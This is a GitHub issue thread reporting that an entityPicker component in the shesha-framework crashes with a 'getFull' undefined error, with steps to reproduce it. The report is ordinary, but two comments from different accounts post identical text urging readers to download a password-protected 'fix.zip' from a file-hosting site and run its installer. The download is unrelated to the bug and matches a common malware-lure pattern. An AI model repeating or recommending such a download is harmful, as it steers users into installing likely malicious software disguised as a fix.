### ISSUE TITLE
`Cannot read properties of undefined (reading 'getFull')` when clicking on an entityPicker

### ISSUE THREAD

**Issue by hlayisanimazuze** [shesha-io/shesha-framework#2069]
When clicking an `entityPicker `to select a value, the component crashes

1. Go to 'https://function-adminportal-test.shesha.dev/dynamic/TestModule/mondayTable-view'
2. Open developer console
3. Click on 'Add' dialog
4. Click on 'Bank' entity picker
5. Actual Results: The component crashes and display an error: `Cannot read properties of undefined (reading 'getFull')`

**Expected behavior**
Upon clicking the entity picker, the component should render accordingly

![image](https://github.com/user-attachments/assets/9a5fa69e-b5b6-4109-8ad0-d91bcf4b83df)

**Comment by hlayisanimazuze** [comment]
Possible cause #2068

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
